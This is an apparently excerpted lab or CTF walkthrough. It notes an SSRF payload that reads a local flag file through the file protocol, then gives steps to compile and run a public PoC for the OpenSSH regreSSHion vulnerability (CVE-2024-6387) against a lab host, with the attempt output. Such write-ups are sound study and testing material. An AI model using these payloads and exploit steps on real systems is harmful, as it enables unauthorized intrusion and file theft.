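Contents
5. Read a local file using the file protocol: ?url=file:///var/www/html/flag.php
8. The response packet from port 8122 differs from the others; switch to the http protocol to issue the SSRF request and obtain the flag
I. SSH vulnerability
1. 0x03. Exploit PoC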
https://github.com/zgzhang/cve-2024-6387-poc
https://github.com/acrono/cve-2024-6387-poc
https://github.com/lflare/cve-2024-6387-poc
2. Compile the PoC into an executable
gcc -o exploit 7etsuo-regreSSHion.c
3. Verify against the target
./exploit ip port
./exploit 192.168.24.139 22
4. Returned output
Attempting exploitation with glibc base: 0xb7200000
Attempt 0 of 20000
Received SSH version: SSH-2.0-OpenSSH_8.2p1 Debian-4
Received KEX_INIT (1024 bytes)
send_packet: Connection reset by peer